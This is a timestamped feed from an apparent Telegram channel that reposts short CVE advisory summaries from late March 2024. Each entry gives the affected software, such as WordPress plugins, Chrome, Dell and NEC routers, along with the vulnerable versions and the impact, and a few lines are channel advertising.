🚨 CVE-2024-2411The MasterStudy LMS plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.0 via the 'modal' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-03-29 09:37:24 |
🚨 CVE-2024-2409The MasterStudy LMS plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 3.3.1. This is due to insufficient validation checks within the _register_user() function called by the 'wp_ajax_nopriv_stm_lms_register' AJAX action. This makes it possible for unauthenticated attackers to register a user with administrator-level privileges when MasterStudy LMS Pro is installed and the LMS Forms Editor add-on is enabled.🎖@cveNotify |
|
| 2024-03-29 08:37:25 |
🚨 CVE-2024-2250The 130+ Widgets | Best Addons For Elementor – FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-29 07:37:32 |
🚨 CVE-2024-1858The Lightbox slider – Responsive Lightbox Gallery plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.9.9 via deserialization of untrusted input through post meta data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-03-29 07:37:25 |
🚨 CVE-2024-0608The WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting plugin for WordPress is vulnerable to union-based SQL Injection via the 'email' parameter in all versions up to, and including, 1.12.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-03-29 07:37:24 |
🚨 CVE-2017-20186** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in nikooo777 ckSurf up to 1.19.2. It has been declared as problematic. This vulnerability affects the function SpecListMenuDead of the file csgo/addons/sourcemod/scripting/ckSurf/misc.sp of the component Spectator List Name Handler. The manipulation of the argument cleanName leads to denial of service. Upgrading to version 1.21.0 is able to address this issue. The name of the patch is fd6318d99083a06363091441a0614bd2f21068e6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-238156. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-03-29 06:37:26 |
🚨 CVE-2024-2936The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _id attribute of widgets in all versions up to, and including, 1.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-29 06:37:25 |
🚨 CVE-2024-29316NodeBB 3.6.7 is vulnerable to Incorrect Access Control, e.g., a low-privileged attacker can access the restricted tabs for the Admin group via "isadmin":true.🎖@cveNotify |
|
| 2024-03-29 06:28:46 |
None |
|
| 2024-03-29 05:37:31 |
🚨 CVE-2024-3077An malicious BLE device can crash BLE victim device by sending malformed gatt packet🎖@cveNotify |
|
| 2024-03-29 05:37:30 |
🚨 CVE-2024-2475The Media Library Assistant plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-29 05:37:25 |
🚨 CVE-2024-29131Out-of-bounds Write vulnerability in Apache Commons Configuration.This issue affects Apache Commons Configuration: from 2.0 before 2.10.1.Users are recommended to upgrade to version 2.10.1, which fixes the issue.🎖@cveNotify |
|
| 2024-03-29 05:37:24 |
🚨 CVE-2024-28176jose is JavaScript module for JSON Object Signing and Encryption, providing support for JSON Web Tokens (JWT), JSON Web Signature (JWS), JSON Web Encryption (JWE), JSON Web Key (JWK), JSON Web Key Set (JWKS), and more. A vulnerability has been identified in the JSON Web Encryption (JWE) decryption interfaces, specifically related to the support for decompressing plaintext after its decryption. Under certain conditions it is possible to have the user's environment consume unreasonable amount of CPU time or memory during JWE Decryption operations. This issue has been patched in versions 2.0.7 and 4.15.5.🎖@cveNotify |
|
| 2024-03-29 04:37:43 |
🚨 CVE-2024-2886Use after free in WebCodecs in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-29 04:37:42 |
🚨 CVE-2024-2883Use after free in ANGLE in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2024-03-29 03:37:30 |
🚨 CVE-2024-2887Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-29 03:37:25 |
🚨 CVE-2024-27319Versions of the package onnx before and including 1.15.0 are vulnerable to Out-of-bounds Read as the ONNX_ASSERT and ONNX_ASSERTM functions have an off by one string copy.🎖@cveNotify |
|
| 2024-03-29 03:37:24 |
🚨 CVE-2024-27318Versions of the package onnx before and including 1.15.0 are vulnerable to Directory Traversal as the external_data field of the tensor proto can have a path to the file which is outside the model current directory or user-provided directory. The vulnerability occurs as a bypass for the patch added for CVE-2022-25882.🎖@cveNotify |
|
| 2024-03-28 23:37:30 |
🚨 CVE-2024-28714SQL Injection vulnerability in CRMEB_Java e-commerce system v.1.3.4 allows an attacker to execute arbitrary code via the groupid parameter.🎖@cveNotify |
|
| 2024-03-28 23:37:29 |
🚨 CVE-2024-28456Cross Site Scripting vulnerability in Campcodes Online Marriage Registration System v.1.0 allows a remote attacker to execute arbitrary code via the text fields in the marriage registration request form.🎖@cveNotify |
|
| 2024-03-28 23:37:26 |
🚨 CVE-2024-24407SQL Injection vulnerability in Best Courier management system v.1.0 allows a remote attacker to obtain sensitive information via print_pdets.php component.🎖@cveNotify |
|
| 2024-03-28 23:37:25 |
🚨 CVE-2021-31156Allied Telesis AT-S115 1.2.0 devices before 1.00.024 with Boot Loader 1.00.006 allow Directory Traversal to achieve partial access to data.🎖@cveNotify |
|
| 2024-03-28 23:37:24 |
🚨 CVE-2024-24399An arbitrary file upload vulnerability in LeptonCMS v7.0.0 allows authenticated attackers to execute arbitrary code via uploading a crafted PHP file.🎖@cveNotify |
|
| 2024-03-28 22:37:24 |
🚨 CVE-2023-25341A Directory Traversal vulnerability in ladle dev server 2.5.1 and earlier allows an attacker on the same network to read files accessible to the user via GET requests.🎖@cveNotify |
|
| 2024-03-28 21:37:24 |
🚨 CVE-2024-23727The YI Smart Kami Vision com.kamivision.yismart application through 1.0.0_20231219 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component.🎖@cveNotify |
|
| 2024-03-28 21:07:43 |
🚨 CVE-2024-25954Dell PowerScale OneFS, versions 9.5.0.x through 9.7.0.x, contain an insufficient session expiration vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2024-03-28 21:07:42 |
🚨 CVE-2024-25952Dell PowerScale OneFS versions 8.2.2.x through 9.7.0.x contains an UNIX symbolic link (symlink) following vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to denial of service, information tampering.🎖@cveNotify |
|
| 2024-03-28 21:07:41 |
🚨 CVE-2024-25946Dell vApp Manager, versions prior to 9.2.4.9 contain a Command Injection Vulnerability. An authorized attacker could potentially exploit this vulnerability leading to an execution of an inserted command. Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-03-28 21:07:37 |
🚨 CVE-2023-42974A race condition was addressed with improved state handling. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Sonoma 14.2. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-03-28 21:07:36 |
🚨 CVE-2023-42962This issue was addressed with improved checks This issue is fixed in iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. A remote attacker may be able to cause a denial-of-service.🎖@cveNotify |
|
| 2024-03-28 21:07:35 |
🚨 CVE-2023-42956The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, iOS 17.2 and iPadOS 17.2, macOS Sonoma 14.2. Processing web content may lead to a denial-of-service.🎖@cveNotify |
|
| 2024-03-28 21:07:32 |
🚨 CVE-2023-42950A use after free issue was addressed with improved memory management. This issue is fixed in Safari 17.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-03-28 21:07:31 |
🚨 CVE-2023-42936This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, tvOS 17.2, watchOS 10.2, macOS Sonoma 14.2. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-03-28 21:07:30 |
🚨 CVE-2023-42930This issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6.3, macOS Sonoma 14.2, macOS Monterey 12.7.2. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-03-28 21:07:26 |
🚨 CVE-2023-42896An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Monterey 12.7.2, macOS Ventura 13.6.3, iOS 17.2 and iPadOS 17.2, iOS 16.7.3 and iPadOS 16.7.3, macOS Sonoma 14.2. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-03-28 21:07:25 |
🚨 CVE-2023-40390A privacy issue was addressed by moving sensitive data to a protected location. This issue is fixed in macOS Sonoma 14.2. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-03-28 19:37:42 |
🚨 CVE-2024-3019A flaw was found in PCP. The default pmproxy configuration exposes the Redis server backend to the local network, allowing remote command execution with the privileges of the Redis user. This issue can only be exploited when pmproxy is running. By default, pmproxy is not running and needs to be started manually. The pmproxy service is usually started from the 'Metrics settings' page of the Cockpit web interface. This flaw affects PCP versions 4.3.4 and newer.🎖@cveNotify |
|
| 2024-03-28 19:37:41 |
🚨 CVE-2024-31064Cross Site Scripting vulnerability in Insurance Mangement System v.1.0.0 and before allows a remote attacker to execute arbitrary code via the First Name input field.🎖@cveNotify |
|
| 2024-03-28 19:37:40 |
🚨 CVE-2024-31063Cross Site Scripting vulnerability in Insurance Mangement System v.1.0.0 and before allows a remote attacker to execute arbitrary code via the Email input field.🎖@cveNotify |
|
| 2024-03-28 19:37:36 |
🚨 CVE-2024-31061Cross Site Scripting vulnerability in Insurance Mangement System v.1.0.0 and before allows a remote attacker to execute arbitrary code via the Last Name input field.🎖@cveNotify |
|
| 2024-03-28 19:37:35 |
🚨 CVE-2024-28713An issue in Mblog Blog system v.3.5.0 allows an attacker to execute arbitrary code via a crafted file to the theme management feature.🎖@cveNotify |
|
| 2024-03-28 19:37:34 |
🚨 CVE-2024-27719A cross site scripting (XSS) vulnerability in rems FAQ Management System v.1.0 allows a remote attacker to obtain sensitive information via a crafted payload to the Frequently Asked Question field in the Add FAQ function.🎖@cveNotify |
|
| 2024-03-28 19:37:31 |
🚨 CVE-2024-25971Dell PowerProtect Data Manager, version 19.15, contains an XML External Entity Injection vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to information disclosure, denial-of-service.🎖@cveNotify |
|
| 2024-03-28 19:37:30 |
🚨 CVE-2024-25955Dell vApp Manager, versions prior to 9.2.4.9 contain a Command Injection Vulnerability. An authorized attacker could potentially exploit this vulnerability leading to an execution of an inserted command. Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-03-28 19:37:29 |
🚨 CVE-2024-25954Dell PowerScale OneFS, versions 9.5.0.x through 9.7.0.x, contain an insufficient session expiration vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2024-03-28 19:37:26 |
🚨 CVE-2024-25953Dell PowerScale OneFS versions 9.4.0.x through 9.7.0.x contains an UNIX symbolic link (symlink) following vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to denial of service, information tampering.🎖@cveNotify |
|
| 2024-03-28 19:37:25 |
🚨 CVE-2024-25946Dell vApp Manager, versions prior to 9.2.4.9 contain a Command Injection Vulnerability. An authorized attacker could potentially exploit this vulnerability leading to an execution of an inserted command. Dell recommends customers to upgrade at the earliest opportunity.🎖@cveNotify |
|
| 2024-03-28 19:37:24 |
🚨 CVE-2020-36771CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a command line argument. In some configurations this allows local users to view the authentication token via the process list and gain code execution as another user.🎖@cveNotify |
|
| 2024-03-28 18:37:25 |
🚨 CVE-2024-25961Dell PowerScale OneFS versions 8.2.2.x through 9.7.0.x contains an improper privilege management vulnerability. A local high privileged attacker could potentially exploit this vulnerability, leading to escalation of privileges.🎖@cveNotify |
|
| 2024-03-28 18:37:24 |
🚨 CVE-2024-25959Dell PowerScale OneFS versions 9.4.0.x through 9.7.0.x contains an insertion of sensitive information into log file vulnerability. A low privileged local attacker could potentially exploit this vulnerability, leading to sensitive information disclosure, escalation of privileges.🎖@cveNotify |
|
| 2024-03-28 16:37:35 |
🚨 CVE-2024-30594Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the deviceMac parameter of the addWifiMacFilter function.🎖@cveNotify |
|
| 2024-03-28 16:37:28 |
🚨 CVE-2024-27775SysAid before version 23.2.14 b18 - CWE-918: Server-Side Request Forgery (SSRF) may allow exposing the local OS user's NTLMv2 hash🎖@cveNotify |
|
| 2024-03-28 16:37:27 |
🚨 CVE-2018-8822Incorrect buffer length handling in the ncp_read_kernel function in fs/ncpfs/ncplib_kernel.c in the Linux kernel through 4.15.11, and in drivers/staging/ncpfs/ncplib_kernel.c in the Linux kernel 4.16-rc through 4.16-rc6, could be exploited by malicious NCPFS servers to crash the kernel or execute code.🎖@cveNotify |
|
| 2024-03-28 15:37:32 |
🚨 CVE-2024-30597Tenda FH1203 v2.0.1.6 firmware has a stack overflow vulnerability in the security parameter of the formWifiBasicSet function.🎖@cveNotify |
|
| 2024-03-28 15:37:25 |
🚨 CVE-2023-45706An administrative user of WebReports may perform a Cross Site Scripting (XSS) and/or Man in the Middle (MITM) exploit through SAML configuration.🎖@cveNotify |
|
| 2024-03-28 15:37:24 |
🚨 CVE-2023-35121Improper access control in the Intel(R) oneAPI DPC++/C++ Compiler before version 2022.2.1 for some Intel(R) oneAPI Toolkits before version 2022.3.1 may allow authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-03-28 14:37:29 |
🚨 CVE-2024-29200Kimai is a web-based multi-user time-tracking application. The permission `view_other_timesheet` performs differently for the Kimai UI and the API, thus returning unexpected data through the API. When setting the `view_other_timesheet` permission to true, on the frontend, users can only see timesheet entries for teams they are a part of. When requesting all timesheets from the API, however, all timesheet entries are returned, regardless of whether the user shares team permissions or not. This vulnerability is fixed in 2.13.0.🎖@cveNotify |
|
| 2024-03-28 14:37:26 |
🚨 CVE-2024-28109veraPDF-library is a PDF/A validation library. Executing policy checks using custom schematron files invokes an XSL transformation that could lead to a remote code execution (RCE) vulnerability. This vulnerability is fixed in 1.24.2.🎖@cveNotify |
|
| 2024-03-28 14:37:25 |
🚨 CVE-2023-47038A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.🎖@cveNotify |
|
| 2024-03-28 14:37:24 |
🚨 CVE-2013-4558The get_parent_resource function in repos.c in mod_dav_svn Apache HTTPD server module in Subversion 1.7.11 through 1.7.13 and 1.8.1 through 1.8.4, when built with assertions enabled and SVNAutoversioning is enabled, allows remote attackers to cause a denial of service (assertion failure and Apache process abort) via a non-canonical URL in a request, as demonstrated using a trailing /.🎖@cveNotify |
|
| 2024-03-28 13:37:26 |
🚨 CVE-2024-30596Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the deviceId parameter of the formSetDeviceName function.🎖@cveNotify |
|
| 2024-03-28 13:37:25 |
🚨 CVE-2024-29896Astro-Shield is a library to compute the subresource integrity hashes for your JS scripts and CSS stylesheets. When automated CSP headers generation for SSR content is enabled and the web application serves content that can be partially controlled by external users, then it is possible that the CSP headers generation feature might be "allow-listing" malicious injected resources like inlined JS, or references to external malicious scripts. The fix is available in version 1.3.0.🎖@cveNotify |
|
| 2024-03-28 13:37:24 |
🚨 CVE-2024-27775SysAid before version 23.2.14 b18 - CWE-918: Server-Side Request Forgery (SSRF) may allow exposing the local OS user's NTLMv2 hash🎖@cveNotify |
|
| 2024-03-28 13:07:32 |
🚨 CVE-2024-2091The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.13.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-03-28 13:07:26 |
🚨 CVE-2024-3024A vulnerability was found in appneta tcpreplay up to 4.4.4. It has been classified as problematic. This affects the function get_layer4_v6 of the file /tcpreplay/src/common/get.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-258333 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-28 13:07:25 |
🚨 CVE-2024-2110The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.4.7.1. This is due to missing or incorrect nonce validation on several actions. This makes it possible for unauthenticated attackers to modify booking statuses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-28 13:07:24 |
🚨 CVE-2024-1770The Meta Tag Manager plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.0.2 via deserialization of untrusted input in the get_post_data function. This makes it possible for authenticated attackers, with contributor access or higher, to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-03-28 12:37:27 |
🚨 CVE-2024-30595Tenda FH1202 v1.2.0.14(408) has a stack overflow vulnerability in the deviceId parameter of the addWifiMacFilter function.🎖@cveNotify |
|
| 2024-03-28 09:59:41 |
https://t.me/malwr |
|
| 2024-03-28 09:37:25 |
🚨 CVE-2024-30421Cross-Site Request Forgery (CSRF) vulnerability in Pixelite Events Manager.This issue affects Events Manager: from n/a through 6.4.7.1.🎖@cveNotify |
|
| 2024-03-28 09:37:24 |
🚨 CVE-2023-45754Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in I Thirteen Web Solution Easy Testimonial Slider and Form allows Stored XSS.This issue affects Easy Testimonial Slider and Form: from n/a through 1.0.18.🎖@cveNotify |
|
| 2024-03-28 08:37:25 |
🚨 CVE-2023-52628In the Linux kernel, the following vulnerability has been resolved:netfilter: nftables: exthdr: fix 4-byte stack OOB writeIf priv->len is a multiple of 4, then dst[len / 4] can write pastthe destination array which leads to stack corruption.This construct is necessary to clean the remainder of the registerin case ->len is NOT a multiple of the register size, so make itconditional just like nft_payload.c does.The bug was added in 4.1 cycle and then copied/inherited whentcp/sctp and ip option support was added.Bug reported by Zero Day Initiative project (ZDI-CAN-21950,ZDI-CAN-21951, ZDI-CAN-21961).🎖@cveNotify |
|
| 2024-03-28 08:37:24 |
🚨 CVE-2024-24681An issue was discovered in Yealink Configuration Encrypt Tool (AES version) and Yealink Configuration Encrypt Tool (RSA version before 1.2). There is a single hardcoded key (used to encrypt provisioning documents) across customers' installations.🎖@cveNotify |
|
| 2024-03-28 07:37:33 |
🚨 CVE-2023-52234Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Booster Booster Elite for WooCommerce.This issue affects Booster Elite for WooCommerce: from n/a before 7.1.2.🎖@cveNotify |
|
| 2024-03-28 07:37:26 |
🚨 CVE-2023-39309Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ThemeFusion Fusion Builder.This issue affects Fusion Builder: from n/a through 3.11.1.🎖@cveNotify |
|
| 2024-03-28 07:37:25 |
🚨 CVE-2022-45850Cross-Site Request Forgery (CSRF) vulnerability in Nickys Image Map Pro allows Stored XSS.This issue affects Image Map Pro: from n/a before 5.6.9.🎖@cveNotify |
|
| 2024-03-28 06:37:32 |
🚨 CVE-2024-30221Deserialization of Untrusted Data vulnerability in WP Sunshine Sunshine Photo Cart.This issue affects Sunshine Photo Cart: from n/a through 3.1.1.🎖@cveNotify |
|
| 2024-03-28 06:37:31 |
🚨 CVE-2024-29090Server-Side Request Forgery (SSRF) vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 2.1.4.🎖@cveNotify |
|
| 2024-03-28 06:37:30 |
🚨 CVE-2024-28004Missing Authorization vulnerability in ExtendThemes Colibri Page Builder.This issue affects Colibri Page Builder: from n/a through 1.0.248.🎖@cveNotify |
|
| 2024-03-28 06:37:26 |
🚨 CVE-2024-23500Server-Side Request Forgery (SSRF) vulnerability in Kadence WP Gutenberg Blocks by Kadence Blocks.This issue affects Gutenberg Blocks by Kadence Blocks: from n/a through 3.2.19.🎖@cveNotify |
|
| 2024-03-28 06:37:25 |
🚨 CVE-2023-34370Server-Side Request Forgery (SSRF) vulnerability in Brainstorm Force Starter Templates — Elementor, WordPress & Beaver Builder Templates, Brainstorm Force Premium Starter Templates.This issue affects Starter Templates — Elementor, WordPress & Beaver Builder Templates: from n/a through 3.2.4; Premium Starter Templates: from n/a through 3.2.4.🎖@cveNotify |
|
| 2024-03-28 06:29:01 |
Do you enjoy reading this channel?Perhaps you have thought about placing ads on it?To do this, follow three simple steps:1) Sign up: https://telega.io/c/cveNotify2) Top up the balance in a convenient way3) Create an advertising postIf the topic of your post fits our channel, we will publish it with pleasure. |
|
| 2024-03-28 05:37:38 |
🚨 CVE-2024-30229Deserialization of Untrusted Data vulnerability in GiveWP.This issue affects GiveWP: from n/a through 3.4.2.🎖@cveNotify |
|
| 2024-03-28 05:37:32 |
🚨 CVE-2024-30228Deserialization of Untrusted Data vulnerability in Hercules Design Hercules Core.This issue affects Hercules Core : from n/a through 6.4.🎖@cveNotify |
|
| 2024-03-28 05:37:31 |
🚨 CVE-2024-30225Deserialization of Untrusted Data vulnerability in WPENGINE, INC. WP Migrate.This issue affects WP Migrate: from n/a through 2.6.10.🎖@cveNotify |
|
| 2024-03-28 05:37:30 |
🚨 CVE-2024-30224Deserialization of Untrusted Data vulnerability in Wholesale Team WholesaleX.This issue affects WholesaleX: from n/a through 1.3.2.🎖@cveNotify |
|
| 2024-03-28 05:37:27 |
🚨 CVE-2024-30223Deserialization of Untrusted Data vulnerability in Repute Infosystems ARMember.This issue affects ARMember: from n/a through 4.0.26.🎖@cveNotify |
|
| 2024-03-28 05:37:26 |
🚨 CVE-2024-0673The Pz-LinkCard WordPress plugin through 2.5.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed🎖@cveNotify |
|
| 2024-03-28 05:37:25 |
🚨 CVE-2024-0672The Pz-LinkCard WordPress plugin through 2.5.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-03-28 03:37:25 |
🚨 CVE-2022-40896A ReDoS issue was discovered in pygments/lexers/smithy.py in pygments through 2.15.0 via SmithyLexer.🎖@cveNotify |
|
| 2024-03-28 03:37:24 |
🚨 CVE-2013-4184Perl module Data::UUID from CPAN version 1.219 vulnerable to symlink attacks🎖@cveNotify |
|
| 2024-03-28 02:37:32 |
🚨 CVE-2024-3024A vulnerability was found in appneta tcpreplay up to 4.4.4. It has been classified as problematic. This affects the function get_layer4_v6 of the file /tcpreplay/src/common/get.c. The manipulation leads to heap-based buffer overflow. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-258333 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-28 02:37:25 |
🚨 CVE-2024-2110The Events Manager – Calendar, Bookings, Tickets, and more! plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.4.7.1. This is due to missing or incorrect nonce validation on several actions. This makes it possible for unauthenticated attackers to modify booking statuses via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-28 02:37:24 |
🚨 CVE-2013-4184Perl module Data::UUID from CPAN version 1.219 vulnerable to symlink attacks🎖@cveNotify |
|
| 2024-03-28 02:07:44 |
🚨 CVE-2024-2989A vulnerability, which was classified as critical, has been found in Tenda FH1203 2.0.1.6. Affected by this issue is the function fromNatStaticSetting of the file /goform/NatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-258158 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-28 02:07:37 |
🚨 CVE-2024-20308A vulnerability in the IKEv1 fragmentation code of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a heap underflow, resulting in an affected device reloading. This vulnerability exists because crafted, fragmented IKEv1 packets are not properly reassembled. An attacker could exploit this vulnerability by sending crafted UDP packets to an affected system. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a denial of service (DoS) condition. Note: Only traffic that is directed to the affected system can be used to exploit this vulnerability. This vulnerability can be triggered by IPv4 and IPv6 traffic..🎖@cveNotify |
|
| 2024-03-28 02:07:36 |
🚨 CVE-2023-0582Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ForgeRock Access Management allows Authorization Bypass.This issue affects access management: before 7.3.0, before 7.2.1, before 7.1.4, through 7.0.2.🎖@cveNotify |
|
| 2024-03-28 01:37:32 |
🚨 CVE-2024-28009Improper authentication vulnerability in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN and MR02LN all versions allows a attacker to execute an arbitrary command with the root privilege via the internet.🎖@cveNotify |
|
| 2024-03-28 01:37:26 |
🚨 CVE-2024-28008Active Debug Code in NEC Corporation Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN and MR02LN all versions allows a attacker to execute an arbitrary OS command via the internet.🎖@cveNotify |
|
| 2024-03-28 01:37:25 |
🚨 CVE-2024-28005Aterm WG1800HP4, WG1200HS3, WG1900HP2, WG1200HP3, WG1800HP3, WG1200HS2, WG1900HP, WG1200HP2, W1200EX(-MS), WG1200HS, WG1200HP, WF300HP2, W300P, WF800HP, WR8165N, WG2200HP, WF1200HP2, WG1800HP2, WF1200HP, WG600HP, WG300HP, WF300HP, WG1800HP, WG1400HP, WR8175N, WR9300N, WR8750N, WR8160N, WR9500N, WR8600N, WR8370N, WR8170N, WR8700N, WR8300N, WR8150N, WR4100N, WR4500N, WR8100N, WR8500N, CR2500P, WR8400N, WR8200N, WR1200H, WR7870S, WR6670S, WR7850S, WR6650S, WR6600H, WR7800H, WM3400RN, WM3450RN, WM3500R, WM3600R, WM3800R, WR8166N, MR01LN and MR02LN all versions allows a attacker who has obtained high privileges can execute arbitrary scripts.🎖@cveNotify |
|
| 2024-03-28 01:37:24 |
🚨 CVE-2013-4184Perl module Data::UUID from CPAN version 1.219 vulnerable to symlink attacks🎖@cveNotify |
|
| 2024-03-28 00:37:36 |
